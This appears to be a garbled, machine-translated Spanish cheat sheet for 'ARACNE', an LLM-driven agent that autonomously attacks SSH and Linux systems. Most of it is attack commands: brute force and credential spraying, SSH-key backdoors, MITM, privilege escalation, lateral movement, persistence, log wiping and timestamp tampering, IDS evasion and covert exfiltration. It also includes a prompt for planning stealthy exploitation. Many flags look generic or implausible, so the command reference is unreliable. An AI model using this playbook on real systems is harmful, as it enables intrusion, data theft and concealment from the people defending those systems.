ARACNE Cheat Sheet

"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

ARACNE (Coordinación de Reconocimiento y Ataque Autónomos para la Explotación de Redes) es un agente basado en LLM diseñado específicamente para orientar los servicios de SSH y explorar y explotar de forma autónoma entornos de concha Linux. Combina el razonamiento del modelo de lenguaje grande con técnicas tradicionales de análisis de penetración para realizar ataques sofisticados contra sistemas compatibles con SSH.

NOVEDAD ** Advertencia crítica**: Herramienta de explotación autónoma avanzada. Utilice sólo en los sistemas que posee o tiene autorización escrita explícita para probar. El uso no autorizado es ilegal.

Instalación

Prerrequisitos

# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb

Métodos de instalación

# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v $(pwd)/sessions:/app/sessions aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent

Configuración de configuración

# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true

Comandos básicos

Operaciones básicas

# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status

Gestión de objetivos

# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring

Gestión del período de sesiones

# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise

SSH Reconocimiento y análisis

SSH Service Discovery

# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis

SSH Vulnerability Assessment

# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks

Enumeración del usuario

# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode

SSH autónomo Explotación

Ataques de base credencial

# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware

Ataques basados en clave

# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access

Gastos de Protocolo

# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade

Explotación de Shell Linux

Acceso inicial y Establecimiento de Shell

# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys

Reconocimiento del sistema

# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes

Escalada de Privilege

# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day

Movimiento Lateral

# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata

Adopción de decisiones en potencia

Motor de Razonamiento Autónomo

# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""

Estrategias de ataque adaptables

# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition

Generación de comandos inteligente

# AI-generated commands for exploration
aracne ai generate-commands --session session-123 --exploration
aracne ai generate-commands --session session-123 --privilege-escalation
aracne ai generate-commands --session session-123 --persistence

# Context-aware command selection
aracne ai select-commands --session session-123 --current-context
aracne ai select-commands --session session-123 --objective-focused
aracne ai select-commands --session session-123 --stealth-optimized

# Command effectiveness analysis
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis

Técnicas avanzadas de explotación

Stealth y Evasion

# Stealth mode operations
aracne stealth enable --session session-123 --advanced-evasion
aracne stealth timing --session session-123 --random-delays
aracne stealth obfuscation --session session-123 --command-obfuscation

# Anti-forensics techniques
aracne antiforensics enable --session session-123 --log-cleaning
aracne antiforensics timestamps --session session-123 --timestamp-manipulation
aracne antiforensics artifacts --session session-123 --artifact-removal

# Detection evasion
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry

Persistence Mechanisms

# Establish persistent access
aracne persist establish --session session-123 --multiple-methods
aracne persist establish --session session-123 --stealth-persistence
aracne persist establish --session session-123 --redundant-access

# Persistence validation and testing
aracne persist validate --session session-123 --all-methods
aracne persist test --session session-123 --reconnection-test
aracne persist monitor --session session-123 --persistence-health

# Persistence cleanup and removal
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check

Exfiltración de datos y recogida

# Intelligent data discovery
aracne data discover --session session-123 --sensitive-files
aracne data discover --session session-123 --database-content
aracne data discover --session session-123 --configuration-files

# Data classification and prioritization
aracne data classify --session session-123 --ai-classification
aracne data prioritize --session session-123 --business-value
aracne data assess --session session-123 --sensitivity-analysis

# Secure data exfiltration
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels

Vigilancia y registro

Supervisión del período de sesiones

# Real-time session monitoring
aracne monitor session --session session-123 --real-time
aracne monitor activity --session session-123 --command-tracking
aracne monitor progress --session session-123 --objective-tracking

# Performance and resource monitoring
aracne monitor performance --session session-123 --resource-usage
aracne monitor network --session session-123 --traffic-analysis
aracne monitor system --session session-123 --system-impact

# Alert and notification system
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators

Registro completo

# Enable detailed logging
aracne logging enable --session session-123 --comprehensive
aracne logging enable --session session-123 --ai-decisions
aracne logging enable --session session-123 --command-responses

# Log analysis and insights
aracne logging analyze --session session-123 --pattern-analysis
aracne logging analyze --session session-123 --success-factors
aracne logging analyze --session session-123 --failure-analysis

# Log export and reporting
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format

Consideraciones éticas y de seguridad

Autorización y cumplimiento jurídico

# Define authorized targets and scope
aracne scope define --target 192.168.1.100 --authorized
aracne scope define --network 192.168.1.0/24 --internal-testing
aracne scope validate --target 192.168.1.100 --legal-check

# Documentation and evidence
aracne legal document --session session-123 --authorization-proof
aracne legal evidence --session session-123 --chain-of-custody
aracne legal export --session session-123 --court-ready

# Compliance verification
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive

Gestión de la seguridad y el riesgo

# Risk assessment and management
aracne risk assess --session session-123 --comprehensive
aracne risk monitor --session session-123 --real-time
aracne risk mitigate --session session-123 --automatic

# Safety controls and limits
aracne safety enable --session session-123 --all-controls
aracne safety limits --session session-123 --time-limits
aracne safety boundaries --session session-123 --scope-enforcement

# Emergency procedures
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation

Solución de problemas y optimización

Optimización del rendimiento

# Optimize AI model performance
aracne optimize ai --model-selection --performance-focused
aracne optimize ai --token-usage --cost-optimization
aracne optimize ai --response-time --latency-reduction

# Session performance optimization
aracne optimize session --session session-123 --speed-optimization
aracne optimize session --session session-123 --resource-optimization
aracne optimize session --session session-123 --stealth-optimization

# Network and connectivity optimization
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction

Depuración y diagnóstico

# Debug mode and verbose logging
aracne --debug session start --target 192.168.1.100
aracne --verbose ai plan-attack --target 192.168.1.100
aracne logs view --level debug --component ai-reasoning

# System diagnostics
aracne diagnose system --comprehensive
aracne diagnose ai-models --connectivity-test
aracne diagnose ssh-client --configuration-check

# Error analysis and resolution
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis

Recuperación y respaldo

# Session recovery and restoration
aracne recover session --session-id session-123 --full-recovery
aracne recover state --session session-123 --checkpoint-restore
aracne recover connection --session session-123 --reconnect

# Backup and data protection
aracne backup create --session session-123 --incremental
aracne backup restore --backup-id backup-456 --selective
aracne backup verify --backup-id backup-456 --integrity-check

# Data integrity and validation
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures

Ejemplos de integración

SIEM Integración

# integrations/siem_integration.py
import json
import requests
from aracne.core.integration import BaseIntegration

class SIEMIntegration(BaseIntegration):
    def __init__(self, siem_url, api_key):
        self.siem_url = siem_url
        self.api_key = api_key

    def send_ssh_attempt(self, attempt_data):
        event = {
            "timestamp": attempt_data.timestamp,
            "source": "aracne",
            "event_type": "ssh_attempt",
            "target": attempt_data.target,
            "username": attempt_data.username,
            "success": attempt_data.success,
            "method": attempt_data.method
        }

        self.send_event(event)

    def send_privilege_escalation(self, privesc_data):
        event = {
            "timestamp": privesc_data.timestamp,
            "source": "aracne",
            "event_type": "privilege_escalation",
            "target": privesc_data.target,
            "technique": privesc_data.technique,
            "success": privesc_data.success,
            "privileges_gained": privesc_data.privileges
        }

        self.send_event(event)

    def send_event(self, event):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.siem_url}/api/events",
            headers=headers,
            json=event
        )

        return response.status_code == 200

Threat Intelligence Integración

# integrations/threat_intel.py
import requests
from aracne.core.threat_intel import ThreatIntelProvider

class ThreatIntelIntegration(ThreatIntelProvider):
    def __init__(self, api_key):
        self.api_key = api_key
        self.base_url = "https://api.threatintel.com"

    def get_ssh_vulnerabilities(self, ssh_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
            headers=headers
        )

        if response.status_code == 200:
            return response.json()
        return []

    def get_exploit_techniques(self, target_os, target_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/techniques/{target_os}/{target_version}",
            headers=headers
        )

        if response.status_code == 200:
            return response.json()
        return []

    def report_new_technique(self, technique_data):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.base_url}/techniques/report",
            headers=headers,
            json=technique_data
        )

        return response.status_code == 201

Buenas prácticas

Mejores prácticas de explotación SSH

# Reconnaissance before exploitation
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation
aracne analyze target --target 192.168.1.100 --vulnerability-assessment
aracne plan attack --target 192.168.1.100 --risk-assessment

# Gradual escalation approach
aracne attack gentle --target 192.168.1.100 --low-impact
aracne attack moderate --target 192.168.1.100 --measured-approach
aracne attack aggressive --target 192.168.1.100 --high-confidence

# Stealth and operational security
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive

Optimización del modelo AI

# Model selection and tuning
aracne ai optimize --model-selection --task-specific
aracne ai tune --parameters --performance-focused
aracne ai calibrate --confidence-thresholds --accuracy-focused

# Prompt engineering and optimization
aracne ai optimize-prompts --task ssh-exploitation
aracne ai optimize-prompts --task privilege-escalation
aracne ai optimize-prompts --task lateral-movement

# Continuous learning and improvement
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing

Excelencia operacional

# Session management best practices
aracne session plan --target 192.168.1.100 --comprehensive-planning
aracne session execute --plan session-plan --monitored-execution
aracne session review --session session-123 --lessons-learned

# Documentation and reporting
aracne document session --session session-123 --comprehensive
aracne report generate --session session-123 --technical-details
aracne evidence collect --session session-123 --forensic-quality

# Quality assurance and validation
aracne validate findings --session session-123 --cross-verification
aracne verify exploits --session session-123 --proof-of-concept
aracne assess impact --session session-123 --business-context

Recursos

Documentación

• ARACNE Documentation
• SSH Exploitation Guide
• Manual de integración de AI

Investigación y Documentos

• ARACNE Research Papers
• Explotación basada en la LLM
• Autonomous Hacking Systems

Comunidad

• ARACNE GitHub
• Foro de investigación de seguridad
• Discord de seguridad de AI

Capacitación

• Explotación avanzada de SSH
• AI-Powered Pentesting
• Linux Post-Exploitation